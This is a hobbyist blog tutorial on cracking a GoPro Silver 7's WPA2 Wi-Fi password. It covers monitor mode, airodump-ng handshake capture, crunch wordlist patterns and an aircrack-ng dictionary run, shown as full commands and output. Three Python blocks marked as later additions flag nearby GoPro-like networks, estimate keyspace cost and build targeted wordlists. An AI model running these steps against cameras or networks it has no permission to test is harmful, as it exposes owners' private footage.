Thanos Stantzouris
Posted on December 28, 2020
In this article I am going to walk you through the entire process of hacking a GoPro Silver 7 (which I own). Why? Why not, I say.
Every hacking adventure is full of practice and fun techniques in action. Every time you try to hack or crack a device you learn something new and gain pure XP (experience points) on the matter.
The History behind the Hack
It was a plain classic Friday and I was on a hacker's high. I just wanted to find something interesting to do. I start gazing around my room when suddenly, out of nowhere, there it was: my GoPro Silver 7, standing alone at exactly the same place it was 4 months ago. It was waiting for me, like a loyal Labrador Retriever... Quite touching... Quite touching indeed... And then the idea hit me! I am gonna hack this shit.
I grab my wireless adapter, fire up my laptop and open up my Kali VirtualBox VM. Then I grab my phone, start scrolling down Reddit, see a cute puppy, get into a conversation about the last season of Silicon Valley, two hours pass by like a breeze, and then I remember.
Wasn't I supposed to be hacking my GoPro? hehe...
So I got back to Work!
TL;DR: I am going to crack my GoPro's built-in wireless network and find the password with the help of:
- Kali Linux virtual machine with a TP-Link TL-WN722N wireless adapter or an Alfa AWUS036NHA high-gain wireless adapter
- Aircrack-ng cracking suite (the "Aircrack" you see in movies)
- Crunch (wordlist generator, pre-installed on Kali)
Disclaimer: All the hacking in this article took place on devices that I own. Do not hack other people's devices unless you have their WRITTEN permission! Ok, that is out of the way now.
1. Reconnaissance
Like it or not, when you embark on a new hacking adventure you always need to scribble down some notes first.
Whatever you may think of it, those notes can prove useful along the way.
My Notes:
- GoPro Model: Silver 7
- Name: StantzGoPro
- Password Type: WPA2
- Password: myGoPro123
And then it hit me. My password is weaker than freaking SpongeBob! But why? I always use super complicated passwords that even I do not remember. Why did I commit this security crime? The answer is simple: boredom and ignorance.
So I reset the network settings, and the new info I got was:
- GoPro Default Name: GP24514525
- GoPro Default Password: Zp2-4Vy-cBp
Ok, that's a random password, but that dash (-) in the 4th and 8th password slot may not be that random. So I reset the wireless options 29 more times!
The results:
- The GoPro Silver 7 generates a random WPA2 password on every reset: 11 characters of mixed-case letters and digits that ALWAYS have dashes in the 4th and 8th slot, like this: @@@-@@@-@@@.
- The dash NEVER changes position.
- There was no occurrence of two digits side by side: 22g, 63f and 281 never happened.
- There was no occurrence of three identical letters side by side: mmm never happened.
That is still a pretty strong password, even when you put all of these rules into the equation! But where there is a pattern, there is an angle of attack.
Did you know that you can rent an Nvidia Tesla K80, a GPU with 4992 CUDA cores, from AWS for $0.90/hour? You can run Hashcat on that thing. One caveat before you get excited about figures like 3 trillion hashes per hour: rates like that are for fast raw hashes such as MD5 or SHA1. A WPA2 guess costs a PBKDF2-HMAC-SHA1 derivation with 4096 iterations, so a GPU of that class tests on the order of a hundred thousand WPA2 candidates per second, not hundreds of millions.
Size matters...
But you know what? I know that this default GoPro password is strong, and I still changed it! Do you want to know why? Because I have one camera but many other devices. I want the password to be easy to remember, as I want to put it on my phone, on my laptop, on my desktop, on my smart fridge, I don't know.
Imagine having to type Zp2-4Vy-cBp every time. And also! Who would hack my GoPro, man? That is so random! So why the strong password? I bet that was my train of thought back when I bought it and set it up for the first time.
Ok, I think that's enough recon for this hack. Let's proceed to network scanning to find our target.
2. Locking onto the Network Target with Aircrack-ng and Grabbing the 4-Way Handshake
That's the cool part of the hacking adventure! Let's fire up the good ol' Kali Linux VM and connect the wireless card!
I used this baby for this hack: the TP-Link TL-WN722N wireless adapter.
When everything is connected, run iwconfig in a terminal for a status check.
root@kali:~# iwconfig
lo no wireless extensions.
eth0 no wireless extensions.
wlan0 IEEE 802.11 ESSID:off/any
Mode:Managed Access Point: Not-Associated Tx-Power=20 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
If you get this result then everything is fine and dandy, as the British say. (I googled that.)
Now the wireless card's mode needs to change from managed to monitor. This is a crucial part. I bought this wireless card because I knew it could work like a champ! But TP-Link has since revised the hardware, and the newer TL-WN722N cards (v2 and v3 use a Realtek chipset instead of the Atheros AR9271 of the v1) do not support monitor mode with the stock driver, so...
You should buy an Alfa card just to be sure: the Alfa AWUS036NHA high-gain wireless adapter.
This one is my favourite because it just works like a charm! You can tell which TL-WN722N revision you have from the Driver and Chipset columns that airmon-ng prints below; ath9k_htc with the AR9271 is the v1.
Putting the card into monitor mode. If you do not need NetworkManager during the capture, run airmon-ng check kill first; otherwise you get the warning shown below, and the card may get flipped back to managed mode in the middle of the capture.
root@kali:~# airmon-ng start wlan0
Found 2 processes that could cause trouble.
Kill them using 'airmon-ng check kill' before putting
the card in monitor mode, they will interfere by changing channels
and sometimes putting the interface back in managed mode
PID Name
476 NetworkManager
941 wpa_supplicant
PHY Interface Driver Chipset
phy0 wlan0 ath9k_htc Qualcomm Atheros Communications AR9271 802.11n
(mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
(mac80211 station mode vif disabled for [phy0]wlan0)
Next step: sniffing out networks with airodump-ng.
root@kali:~# airodump-ng wlan0mon
CH 2 ][ Elapsed: 3 mins ][ 2020-11-12 15:51
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
06:41:69:94:C5:8D -26 13 0 0 11 65 WPA2 CCMP PSK GP24514525
**:**:**:**:**:** -87 2 0 0 1 270 WPA2 CCMP PSK C******-**2591
**:**:**:**:**:** -46 13 211 0 2 270 WPA CCMP PSK H*****n
**:**:**:**:**:** -59 6 0 0 1 130 WPA2 CCMP PSK C*****A
**:**:**:**:**:** -66 7 9 0 11 130 WPA2 CCMP PSK *****le*
**:**:**:**:**:** -77 3 1 0 1 65 WPA2 CCMP PSK CY*****B
**:**:**:**:**:** -80 2 0 0 7 270 OPN CO*******n
**:**:**:**:**:** -80 3 0 0 7 270 WPA2 CCMP PSK ******4403001
**:**:**:**:**:** -80 4 0 0 8 130 WPA2 CCMP PSK W*****522
**:**:**:**:**:** -78 3 0 0 7 130 WPA2 CCMP PSK ****D_BF2EF0
**:**:**:**:**:** -88 4 0 0 13 130 WPA2 CCMP PSK ****CVDW-982
These results represent all the networks around my wireless card, and I am only interested in the first one, the Wi-Fi network of my GoPro.
I put stars on the BSSIDs, as the greatest of lads on Reddit noted that people who are good at OSINT techniques can locate people through WiGLE.
HOW COOL AND SCARY IS THAT.
If I hadn't reset my GoPro, then under the ESSID column you would see StantzGoPro, a dead giveaway of the kind of device. Even the default GP24514525 name follows a recognisable shape.
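An added example, not from the original post: a small Python parser for the airodump-ng table as printed above that pulls out the fields needed for the next command and flags ESSIDs that look like a GoPro, either the default GPxxxxxxxx shape (an assumption generalised from the single GP24514525 seen here) or a custom name that still contains "GoPro". The sample table is constructed from the rows above; the StantzGoPro row is made up to show the renamed-camera case.

```python
import re
from dataclasses import dataclass

# Constructed sample built from the airodump-ng table above. The author masked most
# BSSIDs and ESSIDs with '*', and the parser keeps working on those. The last row
# (StantzGoPro) is made up to show the renamed-camera case.
SAMPLE_SCAN = """\
CH 2 ][ Elapsed: 3 mins ][ 2020-11-12 15:51
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
06:41:69:94:C5:8D -26 13 0 0 11 65 WPA2 CCMP PSK GP24514525
**:**:**:**:**:** -87 2 0 0 1 270 WPA2 CCMP PSK C******-**2591
**:**:**:**:**:** -46 13 211 0 2 270 WPA CCMP PSK H*****n
**:**:**:**:**:** -80 2 0 0 7 270 OPN CO*******n
AA:BB:CC:DD:EE:FF -50 9 3 0 6 130 WPA2 CCMP PSK StantzGoPro
"""

MAC = re.compile(r"^[0-9A-Fa-f*]{2}(:[0-9A-Fa-f*]{2}){5}$")
# Assumption: GoPro default names look like GP + 8 digits, generalised from GP24514525.
GOPRO_DEFAULT = re.compile(r"^GP\d{8}$")


@dataclass
class Network:
    bssid: str
    power: int
    channel: int
    enc: str
    essid: str


def parse_airodump_table(text):
    """Parse the access-point rows of an airodump-ng screen into Network records.

    Columns: BSSID PWR Beacons #Data #/s CH MB ENC [CIPHER AUTH] ESSID. Open (OPN)
    networks have no CIPHER/AUTH columns, and an ESSID may contain spaces, so the
    row is consumed from the left and whatever remains is the ESSID.
    """
    nets = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 8 or not MAC.match(parts[0]) or MAC.match(parts[1]):
            continue            # header, status line, or a station row (BSSID STATION ...)
        bssid, pwr, _beacons, _data, _rate, ch, _mb, enc = parts[:8]
        rest = parts[8:]
        if enc != "OPN":
            rest = rest[2:]     # drop CIPHER and AUTH
        nets.append(Network(bssid, int(pwr), int(ch), enc, " ".join(rest)))
    return nets


def gopro_candidates(nets):
    """Networks that look like a GoPro: the default GPxxxxxxxx name, or a custom
    name that still contains 'gopro' (the StantzGoPro giveaway)."""
    return [n for n in nets
            if GOPRO_DEFAULT.match(n.essid) or "gopro" in n.essid.lower()]


if __name__ == "__main__":
    for n in gopro_candidates(parse_airodump_table(SAMPLE_SCAN)):
        print(f"{n.essid:<16} {n.bssid} channel {n.channel} {n.enc} ({n.power} dBm)")
```

The BSSID, channel and ESSID it returns for the first row are exactly the three values the next airodump-ng command needs.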
A bit of detail here:
- BSSID: 06:41:69:94:C5:8D
- CH (channel): 11
- ENC: WPA2
- ESSID: GP24514525
You should always write these few details down. They keep finding their way into future commands, like the next one:
airodump-ng --bssid 06:41:69:94:C5:8D -c 11 wlan0mon -w Desktop/WPA_Hacks/goPro/goPro
With this command we tell our wireless card to listen only on channel 11 and only for our GoPro's BSSID, and to write everything it captures to files prefixed Desktop/WPA_Hacks/goPro/goPro (airodump-ng adds a counter and an extension, so the capture ends up as goPro-01.cap, which is what aircrack-ng reads later).
By doing this we are trying to capture the 4-way handshake between a client device and the GoPro Wi-Fi.
root@kali:~# airodump-ng --bssid 06:41:69:94:C5:8D -c 11 wlan0mon -w Desktop/WPA_Hacks/goPro/goPro
CH 11 ][ Elapsed: 48 s ][ 2020-11-12 16:00 ][ WPA handshake: 06:41:69:94:C5:8D
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
06:41:69:94:C5:8D -20 36 77 4 0 11 65 WPA2 CCMP PSK GP24514525
BSSID STATION PWR Rate Lost Frames Notes Probes
06:41:69:94:C5:8D 42:E7:EC:D6:05:DE -14 1e- 1e 0 5724 EAPOL GP24514525
To capture a handshake, a client has to be online and connecting to the camera, which is quite likely: if you find a GoPro network somewhere around, someone is either connected or about to connect. The capture is only usable once the "WPA handshake: <BSSID>" tag shows up in the top line of airodump-ng, as in the output above.
If a GoPro is off, then its Wi-Fi is not broadcasting. Simple as that.
Once you capture the handshake, the only thing that remains is cracking it!
3. Carving the Dictionary
Now that we hold a capture we can test password guesses against offline, we need a smart dictionary to find the password.
We'll be using the tool Crunch to create it.
Crunch is a wordlist generator that comes pre-installed with Kali Linux out of the box. Mastering this tool is of the essence when you wish to crack a hashed password.
You could always go the brute-force way, but you should always leave that technique as a hail mary.
Based on what I learned about the GoPro password, I could generate a wordlist that would most definitely contain the password with this command:
root@kali:~# crunch 11 11 -t @@@-@@@-@@@ -d 2@ -d 1% -f /usr/share/rainbowcrack/charset.txt mixalpha-numeric -o Desktop/wordlist.txt
This command tells crunch to:
- 11 11: create strings exactly eleven characters long.
- -t: use a pattern, e.g. @@god@@@@, in which only the placeholders change: @ (characters from the charset given with -f, or lowercase letters by default), , (uppercase letters), % (digits) and ^ (symbols). So everything except the dashes (-) will change.
- -d 2@ -d 1%: limit consecutive duplicates. -d 2@ lets aa happen but never aaa. Note that -d 1% only governs % slots, and this pattern has none, so the "no two digits side by side" rule from the recon is not actually enforced by this command; the line count crunch reports below is exactly 62^9 minus the strings with three identical characters in one group.
- -f: take the characters for the @ slots from a charset file. Because we want lowercase, uppercase and digits, we go with mixalpha-numeric (62 symbols).
- -o: save the output to wordlist.txt in the Desktop directory.
These parameters would make crunch produce a dictionary containing our target's password. But there is a slight, little, tiny problem...
root@kali:~# crunch 11 11 -t @@@-@@@-@@@ -d 2@ -d 1% -f /usr/share/rainbowcrack/charset.txt mixalpha-numeric -o Desktop/wordlist.txt
Crunch will now generate the following amount of data: 162318293407261152 bytes
154798787505 MB
151170690 GB
147627 TB
144 PB
Crunch will now generate the following number of lines: 13526524450605096
The output would be H U G E.
But for the sake of the proof of concept (PoC), let's demonstrate the dictionary attack.
Note to the future: if you are reading this in 2030, 144 PB was a lot of data back in the COVID crisis! So good for you! You can crack WPA2 passwords easily! Congrats.
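To put numbers on the recon observations and on the crunch output above, here is an added example (not part of the original post) in Python. It counts the keyspace of the crunch pattern without enumerating it, reproduces crunch's line and byte figures, shows what the extra "no two digits side by side" rule would have saved, and measures what one WPA2 guess costs, since the Master Key that aircrack-ng prints is PBKDF2-HMAC-SHA1 of the passphrase and the ESSID. The pattern and ESSID are the ones from this post; the benchmark strings and the assumed GPU rates are constructed.

```python
import hashlib
import string
import time

# crunch's mixalpha-numeric charset: 62 symbols. The '-' in the pattern is a literal.
MIXALPHA_NUMERIC = string.ascii_lowercase + string.ascii_uppercase + string.digits
PATTERN = "@@@-@@@-@@@"
ESSID = "GP24514525"


def count_candidates(pattern, charset, max_run=None, no_adjacent_digits=False):
    """Count the strings a crunch-style pattern expands to, without enumerating them.

    '@' slots take any charset symbol; every other pattern character is literal.
    max_run=2 mirrors crunch's `-d 2@` (no symbol three times in a row).
    no_adjacent_digits is the rule observed over 30 resets; the crunch command on
    the page does not enforce it, because `-d 1%` only governs '%' slots.
    Dynamic programming over (last symbol, length of the current run).
    """
    states = {("", 0): 1}                       # (last symbol, run length) -> prefixes
    for slot in pattern:
        options = charset if slot == "@" else slot
        nxt = {}
        for (last, run), n in states.items():
            for c in options:
                if no_adjacent_digits and last.isdigit() and c.isdigit():
                    continue
                r = run + 1 if c == last else 1
                if max_run is not None and r > max_run:
                    continue
                nxt[(c, r)] = nxt.get((c, r), 0) + n
        states = nxt
    return sum(states.values())


def wordlist_bytes(n_lines, pattern):
    """crunch sizes its output as one candidate plus a newline per line."""
    return n_lines * (len(pattern) + 1)


def wpa2_pmk(passphrase, essid):
    """The 'Master Key' aircrack-ng prints is the PMK:
    PBKDF2-HMAC-SHA1(passphrase, ESSID, 4096 iterations, 32 bytes).
    Each dictionary entry costs one of these before its EAPOL MIC can be checked."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), essid.encode(), 4096, 32)


def seconds_per_pmk(essid=ESSID, samples=50):
    """Single-core cost of one candidate on this machine (constructed benchmark input)."""
    t0 = time.perf_counter()
    for i in range(samples):
        wpa2_pmk(f"cand-{i:06d}", essid)
    return (time.perf_counter() - t0) / samples


def years_to_exhaust(n_candidates, rate_per_second):
    return n_candidates / rate_per_second / (365 * 24 * 3600)


if __name__ == "__main__":
    raw = count_candidates(PATTERN, MIXALPHA_NUMERIC)
    crunch = count_candidates(PATTERN, MIXALPHA_NUMERIC, max_run=2)
    observed = count_candidates(PATTERN, MIXALPHA_NUMERIC, max_run=2, no_adjacent_digits=True)
    print(f"62^9, no rules          : {raw:,}")
    print(f"crunch -d 2@ (the page) : {crunch:,} lines, {wordlist_bytes(crunch, PATTERN) / 1e15:.0f} PB")
    print(f"+ no adjacent digits    : {observed:,} ({observed / raw:.0%} of the raw keyspace)")
    per = seconds_per_pmk()
    print(f"one PBKDF2 on this CPU  : {per * 1e3:.2f} ms, {1 / per:,.0f} candidates/s per core")
    # Assumed rates: 1e5/s is roughly a K80-class GPU on WPA2, 1e6/s a current high-end GPU.
    for rate in (1 / per, 1e5, 1e6):
        print(f"  at {rate:,.0f}/s: {years_to_exhaust(observed, rate):,.0f} years to exhaust")
    print("PMK of the recovered key:", wpa2_pmk("9vm-WJN-Vf3", ESSID).hex())
```

Two things worth noticing when you run it: the line and byte counts come out identical to what crunch printed, which confirms that only the three-in-a-row rule was applied, and the "no adjacent digits" rule the reset experiment revealed removes only about one seventh of the keyspace, leaving thousands of years of work even at a million guesses per second. Patterns help; they do not turn a random 9-symbol key into a weak one.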
If we went through with crunch we would eventually have a list like the following in our hands. For the PoC, a short 21-entry sample in that shape is enough:
zp2-4vy-cBp
2r6-cnj-Xky
w4f-ceb-DC2
gbs-24d-cas
23H-wec-dv3
P6C-PRt-hrK
Yn9-Cr6-Ybm
s5p-WWN-6n2
HSM-v4Q-khn
CCW-VkJ-FuJ
Pub-bMw-chn
9vm-WJN-Vf3
9vm-wjn-Vf3
9vm-wJn-Vf3
9vm-wjN-Vf3
9vm-wJN-Vf3
9vm-Wjn-Vf3
wrj-hD5-4hZ
k6Z-wjz-mtS
3nk-Ncj-cf9
Rnk-PRt-h1k
Let's use this dictionary to prove a point.
The dictionary attack: the aircrack-ng command for the attack (with the 21-entry sample saved as Desktop/gopro.txt) and the results are:
root@kali:~# aircrack-ng Desktop/WPA_Hacks/goPro/goPro-01.cap -w Desktop/gopro.txt
Reading packets, please wait...
Opening Desktop/WPA_Hacks/goPro/goPro-01.cap
Read 20985 packets.
# BSSID ESSID Encryption
1 06:41:69:94:C5:8D GP24514525 WPA (1 handshake)
Choosing first network as target.
Reading packets, please wait...
Opening Desktop/WPA_Hacks/goPro/goPro-01.cap
Read 20985 packets.
1 potential targets
Aircrack-ng 1.6
[00:00:00] 19/21 keys tested (940.87 k/s)
Time left: 0 seconds 90.48%
KEY FOUND! [ 9vm-WJN-Vf3 ]
Master Key : DD 1D A3 87 9C D5 DF A5 A9 77 D5 EC 35 D4 C6 C3
03 1D F9 4E 6E 03 90 92 41 40 BA 4E FE 2A 92 72
Transient Key : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
EAPOL HMAC : C1 BF EF A3 22 02 9F 4B 19 4C 1B 9C B6 0D EA 1A
Dope feeling, man. Dope, to say the least.
4. Bonus! Wordlist Creation
Ok, everything went perfectly thus far. But what would have happened if, instead of GP24514525, the name was StantzGoPro?
That takes us to an entirely different way of approaching this dictionary thing.
What I am thinking is: "Since he has changed the name, there is NO way in hell that he left that ugly password as default. NO way!"
Here is a thought: he didn't entirely change the name. He kept the word "GoPro" inside, so he may use it again in his password. GoPro is 5 letters, and the shortest acceptable WPA2 password is 8 characters. Good.
Let's build a cool dictionary to hack StantzGoPro.
Simple wordlist:
crunch 14 14 -t StantzGoPro%%% -o goPro-simple-wl.txt
This command creates a 1000-line list starting at StantzGoPro000 and ending at StantzGoPro999. The -o flag is required; without it crunch writes the list to stdout instead of a file.
Pretty simple, but powerful if you work with it more. As I said earlier, crunch is a must. Password cracking is not easy, but is hacking easy?
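As an added example that is not from the original post, here is a Python generator that does what the bonus section describes more thoroughly than the single crunch pattern: it combines the tokens an ESSID like StantzGoPro leaks ("Stantz", "GoPro") in every order, with the case variants, separators and tails people actually type, and drops anything that is not a valid WPA2-PSK passphrase (8 to 63 printable ASCII characters) before it can cost a PBKDF2 run in aircrack-ng. The separators, symbol tails and digit widths are my assumptions, not GoPro facts.

```python
import itertools


def wpa2_psk_valid(candidate):
    """A WPA2-PSK passphrase is 8..63 printable ASCII characters. Anything else can
    never be the key, so drop it before it costs a PBKDF2 run in aircrack-ng."""
    return 8 <= len(candidate) <= 63 and all(32 <= ord(ch) <= 126 for ch in candidate)


def case_variants(word):
    """The spellings people actually type: as seen in the ESSID, lower, UPPER, Capitalised."""
    return sorted({word, word.lower(), word.upper(), word.capitalize()})


def build_wordlist(tokens, separators=("", "-", "_"), max_digits=3, symbol_tails=("!", "@", "#")):
    """Targeted candidates from the tokens an ESSID leaks (here 'Stantz' and 'GoPro').

    Every ordering of 1..len(tokens) tokens, x a case variant of each, x a separator,
    x a tail (nothing, a symbol, or 1..max_digits digits, zero-padded). The crunch
    pattern StantzGoPro%%% from the post is a strict subset of this list.
    Separators, symbol tails and digit widths are assumptions, not GoPro facts.
    """
    tails = [""] + list(symbol_tails)
    for width in range(1, max_digits + 1):
        tails += [f"{n:0{width}d}" for n in range(10 ** width)]
    candidates = set()
    for r in range(1, len(tokens) + 1):
        for ordering in itertools.permutations(tokens, r):
            for spelled in itertools.product(*(case_variants(t) for t in ordering)):
                for sep in separators:
                    base = sep.join(spelled)
                    for tail in tails:
                        candidate = base + tail
                        if wpa2_psk_valid(candidate):
                            candidates.add(candidate)
    return sorted(candidates)


if __name__ == "__main__":
    words = build_wordlist(["Stantz", "GoPro"])
    with open("goPro-targeted-wl.txt", "w") as fh:
        fh.write("\n".join(words) + "\n")
    print(f"{len(words)} candidates written; e.g. {words[0]} ... {words[-1]}")
```

Feed the file to aircrack-ng with -w goPro-targeted-wl.txt exactly as the 21-line sample was used above. The length filter is what makes "GoPro" alone never appear while "GoPro123" does, which is the 8-character rule from the bonus section applied automatically rather than by hand.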
Conclusion
Cracking a GoPro password is totally possible, and you can probably understand the danger: it exposes all the images and 4K videos stored in the camera to people with malicious intent. Keep your passwords strong, and store them in a password manager like LastPass. It will make your life easier and hackers' lives a lot more difficult.
Password cracking is an art. It needs attention to detail, a critical way of thinking, and most definitely some good, old-fashioned trial and error sprinkled with some dazzling patience.
There are many roads to take and many more books to read. I created this article / tutorial / PoC, or however you like to call it, just to give something new to the community. I will create a more in-depth article about password cracking and many more real-life hacking PoCs like this one, including phishing, more Wi-Fi hacking, and pretty much whatever spikes my interest at that point. If what you just read feels a bit... advanced, you should also take a look at my other articles on my blog Sudorealm: